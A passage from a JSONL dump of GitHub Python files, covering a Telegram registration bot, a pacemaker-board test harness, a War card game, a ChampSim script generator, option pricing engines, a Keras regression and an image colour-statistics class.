'SELECT_REGION'\n\n\ndef select_provinces(update, context):\n query = update.callback_query\n region_id = context.user_data['region_id']\n region_provinces = sqlite_helpers.get_provinces(region_id)\n\n if 'SELECT_REGION' in query.data:\n context.user_data['current_page'] = 1\n select_region(update, context)\n return 'SELECT_REGION'\n\n elif 'SELECTED_PROVINCE' in query.data:\n pattern, province_id = query.data.split('|')\n province_id = int(province_id)\n if province_id in context.user_data['provinces']:\n context.user_data['provinces'].discard(province_id)\n else:\n context.user_data['provinces'].add(province_id)\n\n elif 'PAGE' in query.data:\n pattern, current_page = query.data.split('|')\n context.user_data['current_page'] = int(current_page)\n\n provinces_keyboard = keyboards.get_provinces_keyboard(\n region_provinces,\n context.user_data['provinces'],\n context.user_data['current_page'],\n )\n send_message(\n update, \n context, \n messages.step_nine_text,\n provinces_keyboard,\n )\n return 'SELECT_PROVINCES'\n\n\ndef save_cities(update, context):\n if update.callback_query:\n if 'CONFIRMED' in update.callback_query.data:\n sqlite_helpers.update_master_cities(\n context.user_data['cities'],\n context.user_data['telegram_id'],\n )\n select_is_house_call(update, context)\n return 'SELECT_IS_HOUSE_CALL'\n else:\n send_message(update, context, messages.add_cities_text)\n else:\n context.user_data['cities'] = update.message.text\n send_confirmation_message(update, context)\n return 'CITIES_WAITING'\n\n\ndef select_is_house_call(update, context):\n query = update.callback_query\n\n if 'PUSH_IS_HOUSE_CALL' in query.data:\n if not context.user_data['is_house_call']:\n context.user_data['is_house_call'] = True\n else:\n context.user_data['is_house_call'] = False\n elif 'SELECT_IS_FIND_JOB' in query.data:\n sqlite_helpers.update_master_is_house_call(\n context.user_data['is_house_call'],\n context.user_data['telegram_id'],\n )\n context.user_data['current_page'] = 1\n select_find_job(update, context)\n return 'SELECT_IS_FIND_JOB'\n \n house_call_keyboard = keyboards.get_house_call_keyboard(\n context.user_data['is_house_call'],\n context.user_data['is_online'],\n )\n send_message(\n update, \n context, \n messages.step_ten_text,\n house_call_keyboard,\n )\n return 'SELECT_IS_HOUSE_CALL'\n\n\ndef select_find_job(update, context):\n query = update.callback_query\n if 'PUSH_IS_FIND_JOB' in query.data:\n if not context.user_data['is_find_job']:\n context.user_data['is_find_job'] = True\n else:\n context.user_data['is_find_job'] = False\n\n elif 'OTHER_INFO' in query.data:\n sqlite_helpers.update_master_is_find_job(\n context.user_data['is_find_job'],\n context.user_data['telegram_id'],\n )\n context.user_data['current_page'] = 1\n other_info(update, context)\n return 'OTHER_INFO'\n\n find_job_keyboard = keyboards.get_find_job_keyboard(\n context.user_data['is_find_job']\n )\n send_message(\n update, \n context, \n messages.step_eleven_text,\n find_job_keyboard,\n )\n return 'SELECT_IS_FIND_JOB'\n\n\ndef other_info(update, context):\n pprint(context.user_data)\n if update.callback_query:\n if 'CONFIRMED' in update.callback_query.data:\n sqlite_helpers.update_master_other_info(\n context.user_data['other_info'],\n context.user_data['telegram_id'],\n )\n show_master_page(update, context)\n return 'SHOW_MASTER_PAGE'\n else:\n send_message(update, context, messages.step_twelve_text,\n keyboards.get_other_info_keyboard())\n else:\n context.user_data['other_info'] = update.message.text\n send_confirmation_message(update, context)\n return 'OTHER_INFO'\n\n\ndef show_master_page(update, context):\n master = sqlite_helpers.get_master(context.user_data['telegram_id'])\n master_specializations = sqlite_helpers.get_master_specializations_names(\n context.user_data['telegram_id'])\n master_provinces = sqlite_helpers.get_master_provinces_names(\n context.user_data['telegram_id']) \n message_text = messages.get_master_page_text(\n master, \n master_specializations,\n master_provinces,\n )\n keyboard = keyboards.get_master_page_keyboard()\n send_message(update, context, message_text, keyboard)\n\n return 'SHOW_MASTER_PAGE'\n\n\n\ndef main():\n formatter = logging.Formatter(\n fmt='%(asctime)s %(name)s:%(lineno)d - %(message)s',\n datefmt='%Y-%b-%d %H:%M:%S (%Z)',\n style='%',\n )\n console_handler = logging.StreamHandler()\n console_handler.setFormatter(formatter)\n console_handler.setLevel(logging.DEBUG)\n\n file_handler = logging.FileHandler(f'{__file__}.log')\n file_handler.setFormatter(formatter)\n file_handler.setLevel(logging.INFO)\n\n logger.addHandler(console_handler)\n logger.addHandler(file_handler)\n logger.setLevel(logging.DEBUG)\n\n keyboards_logger = logging.getLogger('keyboards')\n keyboards_logger.addHandler(console_handler)\n keyboards_logger.setLevel(logging.DEBUG)\n\n keyboards_logger = logging.getLogger('messages')\n keyboards_logger.addHandler(console_handler)\n keyboards_logger.setLevel(logging.DEBUG)\n\n sqlite_helpers_logger = logging.getLogger('sqlite_helpers')\n sqlite_helpers_logger.addHandler(console_handler)\n sqlite_helpers_logger.setLevel(logging.DEBUG)\n\n\n load_dotenv()\n updater = Updater(\n token=os.getenv('TELEGRAM_TOKEN'),\n use_context=True,\n )\n dispatcher = updater.dispatcher\n dispatcher.add_handler(CommandHandler('start', handle_users_reply))\n dispatcher.add_handler(CallbackQueryHandler(handle_users_reply))\n dispatcher.add_handler(MessageHandler(Filters.text, handle_users_reply))\n dispatcher.add_error_handler(error_handler)\n\n updater.start_polling()\n updater.idle()\n\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ArkJzzz/krasotatut","sub_path":"masters_bot.py","file_name":"masters_bot.py","file_ext":"py","file_size_in_byte":21711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6032558157","text":"import threading\nimport serial\nimport queue\nimport tests\nfrom time import sleep\nfrom heartview import detectPeaks\nimport timeit\nimport statistics\nfrom serial.tools.list_ports import comports\nimport k64f\nimport nucleo\n\n# FRDM_HWID = \"0D28:0204\" # mbed\nFRDM_HWID = \"1366:1015\" # JLink\nNUCLEO_HWID = \"0483:374B\" # ST-Link\n\nclass FrdmSerialThread(threading.Thread):\n def __init__(self, serialPort, inQueue, outQueue):\n super().__init__(target=None)\n self.serialPort = serialPort\n self.inQueue = inQueue\n self.outQueue = outQueue\n self._running = True\n\n def run(self):\n with serial.Serial(self.serialPort, baudrate=115200, timeout=2) as frdmSerial:\n while self._running:\n try:\n txData = self.outQueue.get(block=False)\n frdmSerial.write(txData)\n except queue.Empty:\n pass\n rxData = frdmSerial.readline()\n if (not rxData or b'\\x00' in rxData):\n continue\n self.inQueue.put(rxData)\n def stop(self):\n self._running = False\n\nclass NucleoSerialThread(threading.Thread):\n def __init__(self, serialPort, inQueue, outQueue):\n super().__init__(target=None)\n self.serialPort = serialPort\n self.inQueue = inQueue\n self.outQueue = outQueue\n self._running = True\n\n def run(self):\n\n with serial.Serial(self.serialPort, baudrate=115200, timeout=5) as nucleoSerial:\n nucleoSerial.write(b\"\\x00\\x00\\x00\\x00\")\n while self._running:\n try:\n txData = self.outQueue.get(block=False)\n nucleoSerial.write(txData)\n except queue.Empty:\n pass\n while nucleoSerial.read() != b\"\\xff\":\n pass\n rxData = nucleoSerial.read(4)\n if not rxData:\n continue\n self.inQueue.put(rxData)\n def stop(self):\n self._running = False\n\nclass PeakDetectorThread(threading.Thread):\n def __init__(self, dataQueue, threshQueue, atrEvent, ventEvent):\n super().__init__(target=None)\n self.atrEvent = atrEvent\n self.ventEvent = ventEvent\n self.threshQueue = threshQueue\n self.dataQueue = dataQueue\n self.threshold = 5\n self._running = True\n\n def run(self):\n while (self._running):\n try:\n self.threshold = self.threshQueue.get_nowait()\n except queue.Empty:\n pass\n # Recieve data from nucleo\n data = self.dataQueue.get()\n peaks = detectPeaks(data, self.threshold)\n\n if self.atrEvent.isSet():\n if not peaks[0]:\n self.atrEvent.clear()\n else:\n continue\n elif self.ventEvent.isSet():\n if not peaks[1]:\n self.ventEvent.clear()\n else:\n continue\n if peaks[0]:\n self.atrEvent.set()\n if peaks[1]:\n self.ventEvent.set()\n \n def stop(self):\n self._running = False\n\ndef findPorts():\n frdmFound = False\n nucleoFound = False\n nucleoPort = \"\"\n frdmPort = \"\"\n while (True):\n for port in comports():\n if FRDM_HWID in port.hwid:\n frdmFound = True\n frdmPort = port.device\n elif NUCLEO_HWID in port.hwid:\n nucleoFound = True\n nucleoPort = port.device\n if (frdmFound and nucleoFound):\n return [nucleoPort, frdmPort]\n\n\ndef main():\n frdmRxQueue = queue.Queue()\n frdmTxQueue = queue.Queue()\n nucleoRxQueue = queue.Queue()\n nucleoTxQueue = queue.Queue()\n threshQueue = queue.Queue()\n atrEvent = threading.Event()\n ventEvent = threading.Event()\n ports = findPorts()\n frdmSerialThread = FrdmSerialThread(ports[1], frdmRxQueue, frdmTxQueue)\n frdmSerialThread.start()\n nucleoSerialThread = NucleoSerialThread(\n ports[0], nucleoRxQueue, nucleoTxQueue\n )\n nucleo.flash(\"binaries/nucleo.bin\")\n nucleoSerialThread.start()\n peakThread = PeakDetectorThread(nucleoRxQueue, threshQueue, atrEvent, ventEvent)\n peakThread.start()\n k64f.flash(\"binaries/pacing.bin\")\n sleep(1)\n AT1_result = tests.AT1(frdmRxQueue, frdmTxQueue).run()\n print(10*\"=\")\n print(f\"Whoami K64F Test: {AT1_result}\")\n print(10*\"=\")\n AT3_result = tests.AT3(nucleoRxQueue, frdmTxQueue, threshQueue, atrEvent, ventEvent).run()\n print(f\"Pacing Test (ATR, 5V, 10ms): {AT3_result[0]}\")\n print(f\"Pacing Test (VENT, 5V, 10ms): {AT3_result[1]}\")\n print(f\"Pacing Test (ATR, 3V, 5ms): {AT3_result[2]}\")\n print(f\"Pacing Test (VENT, 3V, 5ms): {AT3_result[3]}\")\n print(10*\"=\")\n k64f.flash(\"binaries/sensing.bin\")\n sleep(1)\n AT4_result = tests.AT4(frdmRxQueue, frdmTxQueue, nucleoTxQueue).run()\n print(f\"Sensing Test (ATR, 10ms, 120bpm): {AT4_result[0]}\")\n print(f\"Sensing Test (VENT, 10ms, 120bpm): {AT4_result[1]}\")\n print(10*\"=\")\n frdmSerialThread.stop()\n nucleoSerialThread.stop()\n peakThread.stop()\n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"theguymeyer/heartview","sub_path":"course_dev/testing/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5288,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"20686279352","text":"# War\n# 2 players - highest card wins\n\nimport Cards, Games\n\nclass War_Card(Cards.Card):\n \"\"\" A War Card. \"\"\"\n\n @property\n def value(self):\n\n if self.is_face_up:\n v = War_Card.RANKS.index(self.rank) + 1\n else:\n v = None\n return v\n\nclass War_Deck(Cards.Deck):\n \"\"\" A War Deck. \"\"\"\n def populate(self):\n for suit in War_Card.SUITS:\n for rank in War_Card.RANKS:\n self.cards.append(War_Card(rank, suit))\n\nclass War_Hand(Cards.Hand):\n \"\"\" A War Hand. \"\"\"\n def __init__(self,name,money = 0):\n super(War_Hand, self).__init__()\n self.name = name\n self.money = money\n\n def __str__(self):\n rep = self.name + \":\\t\" + super(War_Hand, self).__str__()\n if self.total:\n rep += \"(\" + str(self.total) + \")\"\n rep += \"$\" + str(self.money)\n return rep\n\n @property\n def total(self):\n # if a card in the hand has value of None, then total is None\n for card in self.cards:\n if not card.value:\n return None\n\n # add up card values, treat each Ace as 1\n t = 0\n for card in self.cards:\n t += card.value\n\n return t\n\n def is_busted(self):\n return self.total > 21\n\nclass War_Player(War_Hand):\n \"\"\"A War Player.\"\"\"\n\n def win(self):\n print(self.name, \"wins.\")\n self.money += 1\n\nclass War_Game(object):\n \"\"\" A Game of War. \"\"\"\n def __init__(self, names):\n self.players = []\n for name in names:\n player = War_Player(name)\n self.players.append(player)\n\n self.deck = War_Deck()\n self.deck.populate()\n self.deck.shuffle()\n\n def play(self):\n\n # deal initial card to both players\n if len(self.deck.cards) < 3:\n self.deck.clear()\n self.deck.populate()\n self.deck.shuffle()\n print(\"\\nReshuffling...\\n\")\n else:\n self.deck.deal(self.players, per_hand = 1)\n for player in self.players:\n print(player)\n if self.players[0].total > self.players[1].total:\n self.players[0].win()\n elif self.players[0].total < self.players[1].total:\n self.players[1].win()\n else:\n print(\"It's a tie!\")\n # remove everyone's cards\n for player in self.players:\n player.clear()\n\ndef main():\n print(\"\\t\\tWelcome to War!\\n\")\n\n names = []\n\n for i in range(2):\n name = None\n while not name:\n name = input(\"Enter player \"+str(i+1)+ \"'s name: \")\n names.append(name)\n\n print()\n\n game = War_Game(names)\n\n again = None\n while again != \"n\" and game.players:\n game.play()\n again = Games.ask_yes_no(\"\\nDo you want to play again? (Y/N): \")\n\nmain()\ninput(\"\\n\\nPress the enter key to exit.\")\n \n","repo_name":"ZebGirouard/zeb-hobby-bucket","sub_path":"Python/pycode/War.py","file_name":"War.py","file_ext":"py","file_size_in_byte":2940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74668171112","text":"\nimport logging,json\n\nfrom parser.f_yaml import Parser\nfrom storage.mongo import MongoStore\nfrom protocol.http import HttpClass\nfrom template_engine.f_jinja2 import Jinja2Engine\n\nlogger = logging.getLogger('fource_logger')\n\nhdlr = logging.FileHandler('/var/tmp/fource.log')\n\nformatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')\n\nhdlr.setFormatter(formatter)\n\nlogger.addHandler(hdlr) \n\nlogger.setLevel(logging.INFO)\n\n\n#Type of Parser\nPARSER_SELECT = {\n 'yml': Parser\n}\n\n#Type of storage for results\nSTORAGE_SELECT = {\n 'mongo': MongoStore\n}\n\n#Protocol followed\nPROTOCOL_SELECT = {\n 'http': HttpClass\n}\n\n\n#Templating engine for house keeping\nTEMPLATE_ENGINE = {\n 'jinja2': Jinja2Engine\n}\n\n\n\n\n","repo_name":"fource/fource","sub_path":"lib/fource/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"3382652604","text":"#!/usr/bin/python3\n\nimport subprocess\nimport os, sys, time, datetime\nimport re, ast\n\nfrom champsim_run_commons import *\n\nscript_header = \"\"\"#!/bin/bash\n#SBATCH -A p2017001\n#SBATCH --time 16:00:0\n#SBATCH --requeue\"\"\"\n\"\"\"#SBATCH --error=/dev/nul\"\"\"\n\"\"\"#SBATCH --output=/dev/nul\"\"\"\n\nif not results_dir in os.listdir(\"/\"):\n\tos.makedirs(results_dir, exist_ok=True)\n\ntry:\n\tfor f in os.listdir(temp_script_dir):\n\t\tos.remove(os.path.join(temp_script_dir, f))\nexcept OSError:\n\tpass\nos.makedirs(temp_script_dir, exist_ok=True)\n\n# try:\n# \tfor f in os.listdir(individual_results_dir):\n# \t\tos.remove(os.path.join(individual_results_dir, f))\n# except OSError:\n# \tpass\nos.makedirs(individual_results_dir, exist_ok=True)\n\nscript_count = 0\n\nprint_index = 0\nscript_limit = 6900\n\nfor t in tests_to_run:\n\tfor i in configurations:\n\t\tfor merged_files in test_files[tests.index(t)]:\n\t\t\tif str(i[0]) not in replacement_algorithms:\n\t\t\t\tprint(\"ERROR: unknown replacment algorithm \" + str(i[0]))\n\t\t\t\texit(1)\n\n\t\t\tif ((print_index * script_limit) <= script_count <= ((print_index + 1) * script_limit)):\n\t\t\t\tcurrent_script = open(temp_script_dir + \"/script\" + str(script_count) + \".sh\", \"w\")\n\n\t\t\t\tcurrent_script.write(script_header)\n\n\t\t\t\tcurrent_script.write(\"\\n\\n\")\n\n\t\t\t\tcurrent_script.write(executables[replacement_algorithms.index(str(i[0]))][conf] + \" \" + \n\t\t\t\t\t\t\t\t\t\t\"-warmup_instructions\" + \" \" + \n\t\t\t\t\t\t\t\t\t\tstr(warmup_inst) + \" \" + \n\t\t\t\t\t\t\t\t\t\t\"-simulation_instructions\" + \" \" + \n\t\t\t\t\t\t\t\t\t\tstr(sim_inst) + \" \" + \n\t\t\t\t\t\t\t\t\t\t\"-queue_length\" + \" \" + \n\t\t\t\t\t\t\t\t\t\tstr(i[3]) + \" \" + \n\t\t\t\t\t\t\t\t\t\t\"-queue_cycles\" + \" \" + \n\t\t\t\t\t\t\t\t\t\tstr(i[4]) + \" \" + \n\t\t\t\t\t\t\t\t\t\t(\"-implement_queue\" if i[1] == 1 else \"\") + \" \" + \n\t\t\t\t\t\t\t\t\t\t(\"-serial_queue\" if i[2] == 1 else \"\") + \" \" + \n\t\t\t\t\t\t\t\t\t\t\"-traces\" + \" \" + \n\t\t\t\t\t\t\t\t\t\tmerged_files[0] + \" \" + \n\t\t\t\t\t\t\t\t\t\t\" > \" + individual_results_dir + \"/\" + \n\t\t\t\t\t\t\t\t\t\t(merged_files[0].replace(\"/\", \"\").replace(\".\", \"\") + \"-\" + str(i[0]) + \"-\" + str(i[1]) + \"-\" + str(i[2]) + \"-\" + str(i[3]) + \"-\" + str(i[4])) + \n\t\t\t\t\t\t\t\t\t\t\"-result.txt\" + \n\t\t\t\t\t\t\t\t\t\t\"\\n\")\n\n\t\t\t\tcurrent_script.close()\n\n\t\t\tscript_count += 1\n","repo_name":"Ahmed-Nematallah/ChampSimQueue","sub_path":"print_commands.py","file_name":"print_commands.py","file_ext":"py","file_size_in_byte":2097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"69958375272","text":"import abc\nimport numpy as np\nimport scipy.stats as sp\nfrom scipy.special import comb\nfrom market_data import MarketData\nfrom mathematics import round_up_to_odd\n\nclass PricingEngine(object):\n\t__metaclass__=abc.ABCMeta\n\tdef calculate(self):\n\t\tpass\n\nclass BinomialPricingEngine(PricingEngine):\n\tdef __init__(self, steps, pricer, greeks):\n\t#def __init__(self, steps, pricer, greeks):\n\t\tself.__steps = steps\n\t\tself.pricer = pricer\n\t\tself.__greeks = greeks\n\n\t@property\n\tdef steps(self):\n\t\treturn self.__steps\n\n\t@steps.setter\n\tdef steps(self, new_steps):\n\t\tself.__steps = new_steps\n\n\tdef calculate(self, option, data):\n\t\treturn self.pricer(self, option, data)\n\n\tdef getGreeks(self, option, data, pricer):\n\t\treturn self.__greeks(self, option, data, pricer)\n\ndef BinomialPricer(engine, option, data):\n\t(spot, rate, volatility, dividend, expiry, strike) = data.get_data()\n\tn = engine.steps\n\t#n = round_up_to_odd(n)\n\tdt = expiry / n\n\t#u = np.exp(volatility * np.sqrt(dt))\n\t#d = 1.0 / u\n\t#p = (np.exp((rate-dividend)*dt)-d) / (u-d)\n\tu = np.exp((rate-dividend-0.5*volatility*volatility)*dt+volatility*np.sqrt(dt))\n\td = np.exp((rate-dividend-0.5*volatility*volatility)*dt-volatility*np.sqrt(dt))\n\t#Df = np.exp(-rate*expiry)\n\tdrift = np.exp(rate*dt)\n\tq = (drift-d)/(u-d)\n\t\n\tstkval = np.zeros((n+1,n+1))\n\toptval = np.zeros((n+1,n+1))\n\tstkval[0,0] = spot\n\tfor i in range(1,n+1):\n\t\tstkval[i,0] = stkval[i-1,0]*u\n\t\tfor j in range(1, i+1):\n\t\t\tstkval[i,j] = stkval[i-1,j-1]*d\n\n\tfor j in range(n+1):\n\t\toptval[n,j] = option.payoff(stkval[n,j], strike)\n\t\n\tfor i in range(n-1,-1,-1):\n\t\tfor j in range(i+1):\n\t\t\toptval[i,j] = (q*optval[i+1,j]+(1.0-q)*optval[i+1,j+1])/drift\n\n\tprice = optval[0,0]\n\t# delta = (optval[1,1]-optval[1,0])/(spot*u-spot*d)\n\t# topleft = (optval[2,2]-optval[2,1])/(spot*u*u-spot)\n\t# topright = (optval[2,1]-optval[2,0])/(spot-spot*d*d)\n\t# bottom = 0.5*(spot*u*u-spot*d*d)\n\t# gamma = (topleft-topright)/bottom\n\t# theta = (optval[2,1]-optval[0,0])/(2.0*dt*365)\n\n\treturn price\n\n\t# sum_ = 0.0\n\n\t# for j in range(n):\n\t# \tSi = spot * u**j * d**(n-j)\n\t# \tsum_ += comb(n,j)* p**j * (1-p)**(n-j)*option.payoff(Si, strike)\n\n\t# price = Df*sum_\n\n\t# return price\n\nclass BlackScholesPricingEngine(PricingEngine):\n\tdef __init__(self, optType, pricer, greeks):\n\t\tself.__optType = optType\n\t\tself.pricer = pricer\n\t\tself.__greeks = greeks\n\n\t@property\n\tdef optType(self):\n\t\treturn self.__optType\n\n\t@optType.setter\n\tdef optType(self, new_optType):\n\t\tself.__optType = new_optType\n\n\tdef calculate(self, option, data):\n\t\treturn self.pricer(self, option, data)\n\n\tdef getGreeks(self, option, data, pricer):\n\t\treturn self.__greeks(self, option, data, pricer)\n\ndef BlackScholesPricer(engine, option, data):\n\t(spot, rate, volatility, q, expiry, strike) = data.get_data()\n\topt_type = engine.optType\n\tdiscount_rate = np.exp(-rate * expiry)\n\tdqr = np.exp(-q*expiry)\n\t\n\td1 = (1.0/(volatility*np.sqrt(expiry)))*(np.log(spot/strike)+\n\t\t((rate-q)+volatility*volatility*0.5)*expiry)\n\td2 = d1 - volatility*np.sqrt(expiry)\n\n\tdef N(x):\n\t\treturn sp.norm.cdf(x)\n\n\tif (opt_type == \"call\") or (opt_type == \"Call\"):\n\t\tprice = N(d1)*spot*dqr-N(d2)*strike*discount_rate\n\telif (opt_type == \"put\") or (opt_type == \"Put\"):\n\t\tprice = N(-d2)*strike*discount_rate-N(-d1)*spot*dqr\n\n\treturn price\n\n\nclass MonteCarloPricingEngine(PricingEngine):\n\tdef __init__(self, replications, time_steps, pricer):\n\t\tself.__replications = replications\n\t\tself.__time_steps = time_steps\n\t\tself.pricer = pricer\n\t\t#self.__greeks = greeks\n\n\t@property\n\tdef replications(self):\n\t\treturn self.__replications\n\n\t@replications.setter\n\tdef replications(self, new_replications):\n\t\tself.__replications = new_replications\n\n\t@property\n\tdef time_steps(self):\n\t\treturn self.__time_steps\n\n\t@time_steps.setter\n\tdef time_steps(self, new_time_steps):\n\t\tself.__time_steps = new_time_steps\n\n\tdef calculate(self, option, data):\n\t\treturn self.pricer(self, option, data)\n\n\t# def getGreeks(self, option, data, pricer):\n\t# \treturn self.__greeks(self, option, data, pricer)\n\ndef Naive_Monte_Carlo_Pricer(engine, option, data):\n\t(S, r, V, q, T, strike) = data.get_data()\n\ttime_steps = engine.time_steps\n\treplications = engine.replications\n\tdiscount_rate = np.exp(-r * T)\n\tdelta_t = T / time_steps\n\tz = np.random.normal(size = time_steps)\n\n\tnudt = ((r-q)-0.5*V*V)*T\n\tsidt = V*np.sqrt(T)\n\n\tS_t = np.zeros((replications, ))\n\tpayoff_t = 0.0\n\tfor i in range(replications):\n\t\tS_t = S * np.exp(nudt + sidt * z[i])\n\t\tpayoff_t += option.payoff(S_t, strike)\n\n\tpayoff_t /= replications\n\tprice = discount_rate * payoff_t\n\n\treturn price\n\ndef Greeks(engine, option, data, pricer):\n\talpha = 0.0001 \n\t(spot, rate, volatility, dividend, expiry, strike) = data.get_data()\n\tdiscount = np.exp(-rate*expiry)\n\tdelta = (pricer(engine, option, \n\t\tMarketData(spot+alpha, rate, volatility, dividend, \n\t\t\texpiry, strike)) - \n\t\tpricer(engine, option, MarketData(spot, rate, \n\t\tvolatility, dividend, expiry, strike))) / alpha\n\tgamma = ((pricer(engine, option, \n\t\tMarketData(spot+alpha, rate, volatility, dividend, \n\t\t\texpiry, strike)) -2.0*\n\t\tpricer(engine, option, MarketData(spot, rate, \n\t\tvolatility, dividend, expiry, strike))) + pricer(engine, option, \n\t\tMarketData(spot-alpha, rate, volatility, \n\t\t\tdividend, expiry, strike)))/(alpha*alpha)\n\trho = (pricer(engine, option, \n\t\tMarketData(spot, rate+alpha, volatility, dividend, \n\t\t\texpiry, strike)) - \n\t\tpricer(engine, option, MarketData(spot, rate, \n\t\tvolatility, dividend, expiry, strike))) / alpha\n\tvega = (pricer(engine, option, \n\t\tMarketData(spot, rate, volatility+alpha, dividend, \n\t\t\texpiry, strike)) - \n\t\tpricer(engine, option, MarketData(spot, rate, \n\t\tvolatility, dividend, expiry, strike))) / alpha\t\n\ttheta = (pricer(engine, option, \n\t\tMarketData(spot, rate, volatility, dividend, \n\t\t\texpiry-(1.0/365.0), strike)) - \n\t\tpricer(engine, option, MarketData(spot, rate, \n\t\tvolatility, dividend, expiry, strike)))\n\n\treturn (delta, gamma, rho/100.0, vega/100.0, theta)","repo_name":"dmat1986/Quantitative-Finance","sub_path":"Python/Pricing-models-OOP/pricing_engine.py","file_name":"pricing_engine.py","file_ext":"py","file_size_in_byte":5894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30726319688","text":"import numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\nimport matplotlib.pyplot as plt\nfrom sklearn.impute import SimpleImputer\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.metrics import r2_score\nfrom tensorflow.python import keras\n\n# Importing data\ndf = pd.read_csv(\"Dataset/water.csv\")\ndf = df.loc[1:1000, ['T_degC', 'Salnty', 'Depthm']]\ndf.head()\n\n# Creating train and test dataset\nmsk = np.random.rand(len(df)) < 0.8\ntrain_raw = df[msk]\ntest_raw = df[~msk]\n\n# Fixing missing values issue and imputing\nimputer = SimpleImputer()\ntrain = pd.DataFrame(imputer.fit_transform(train_raw))\ntrain.columns = df.columns\ntrain.rename(columns={'T_degC': 'TEMP', 'Salnty': 'SALINITY', 'Depthm': 'DEPTH'}, inplace=True)\ntrain = train.reindex(columns={'SALINITY', 'DEPTH', 'TEMP'})\nprint(train.head())\n\ntrain_x = train[['SALINITY', 'DEPTH']]\ntrain_y = train[['TEMP']]\n\n# Splitting into train and test dataset\nX_train_full, X_test, y_train_full, y_test = train_test_split(train_x, train_y, random_state=0)\nX_train, X_valid, y_train, y_valid = train_test_split(X_train_full, y_train_full, random_state=1)\n\nscaler = StandardScaler()\nX_train = scaler.fit_transform(X_train)\nX_valid = scaler.transform(X_valid)\nX_test = scaler.transform(X_test)\n\nmodel = keras.models.Sequential([\n keras.layers.Dense(20, activation=\"relu\"),\n keras.layers.Dense(1)\n])\nmodel.compile(loss=\"mean_squared_error\", optimizer=\"sgd\")\nhistory = model.fit(X_train, y_train, epochs=20, validation_data=(X_valid, y_valid))\nmse_test = model.evaluate(X_test, y_test)\n\n# Predicting\npred = model.predict(X_test)\n\n# Accuracy measures\nprint(\"Mean absolute error: %.2f\" % np.mean(np.absolute(pred - np.asanyarray(y_test))))\nprint(\"Residual sum of squares (MSE): %.2f\" % np.mean((pred - np.asanyarray(y_test)) ** 2))\nprint(\"R2-score: %.2f\" % r2_score(pred, np.asanyarray(y_test)))\n\n# Plotting\npred = model.predict(X_test)\nplt.scatter(pd.DataFrame(X_test[:, 0]), y_test, color='blue')\nplt.scatter(pd.DataFrame(X_test[:, 0]), pred, color='red')\nplt.title('Truth or Bluff (Random Forest Regression)')\nplt.xlabel(\"Salinity\")\nplt.ylabel(\"Temparature\")\nplt.show()\n","repo_name":"dhruvkalia13/ML-journey","sub_path":"5_Artificial_Neural_Networks/Multilayer_Perceptron_Sequential_API/multilayer_Perceptron_regression.py","file_name":"multilayer_Perceptron_regression.py","file_ext":"py","file_size_in_byte":2234,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"37598274477","text":"# coding=utf-8\nimport colorsys\n\n\nclass Properties:\n colors = [(0.125, \"red\"), (0.25, \"orange\"), (0.375, \"yellow\"),\n (0.5, \"green\"), (0.625, \"teal\"), (0.75, \"blue\"),\n (0.875, \"purple\"), (1., \"pink\")]\n\n def __init__(self):\n self.images = []\n self.pix = []\n\n def load(self, images):\n self.images = images\n for image in self.images:\n self.pix.append(image.load())\n\n def rgb_int_to_percent(self, rgb):\n d_tup = (float(rgb[0]) / 255, float(rgb[1]) / 255, float(rgb[2]) / 255)\n return d_tup\n\n # -------------------------------------------------- średnia jasność\n\n def trait_avg_value(self, images):\n avg = 0.\n for image in images:\n avg += self.v_in_image(image)\n return avg / len(images)\n\n def v_in_image(self, image):\n avgv = 0.\n pixels = image.load()\n for i in xrange(image.size[0]):\n for j in xrange(image.size[1]):\n per = self.rgb_int_to_percent(pixels[i, j])\n value = colorsys.rgb_to_hsv(per[0], per[1], per[2])[2]\n avgv += value\n\n return avgv / image.size[0] / image.size[1]\n\n\n # --------------------------------------------------średnia dynamika\n\n def trait_avg_value_change(self, images):\n avg = 0.\n size = len(images)\n if size > 1:\n for i in range(1, size):\n avg += self.avg_pair_value_change(images[i - 1], images[i])\n return avg / (size - 1)\n return 0\n\n def avg_pair_value_change(self, image, image1): # ten sam rozmiar!\n avgv = 0.\n pixels = image.load()\n pixels1 = image1.load()\n for i in xrange(image.size[0]):\n for j in xrange(image.size[1]):\n avgv += self.pixel_value_change(pixels[i, j], pixels1[i, j])\n return avgv / image.size[0] / image.size[1]\n\n def pixel_value_change(self, pixel, pixel1):\n per = self.rgb_int_to_percent(pixel)\n h = colorsys.rgb_to_hsv(per[0], per[1], per[2])[2]\n per = self.rgb_int_to_percent(pixel1)\n h1 = colorsys.rgb_to_hsv(per[0], per[1], per[2])[2]\n return abs(h1 - h)\n\n # ----------------------------------------------------------najczęstszy kolor\n def trait_dominating_color(self, images):\n results = self.dominating_image_colors(images[0])\n for i in range(1, len(images)):\n results = [x + y for x, y in zip(results, self.dominating_image_colors(images[i]))]\n return results\n\n def dominating_image_colors(self, image):\n results = [0, 0, 0, 0, 0, 0, 0, 0]\n pixels = image.load()\n for i in xrange(image.size[0]):\n for j in xrange(image.size[1]):\n results[self.assign_pixel_to_color(pixels[i, j])] += 1\n return results\n\n def assign_pixel_to_color(self, pixel):\n per = self.rgb_int_to_percent(pixel)\n hue = colorsys.rgb_to_hsv(per[0], per[1], per[2])[0]\n return int((hue - 0.0625) * 8)\n\n def get_properties(self):\n return self.trait_avg_value(self.images), \\\n self.trait_avg_value_change(self.images), \\\n 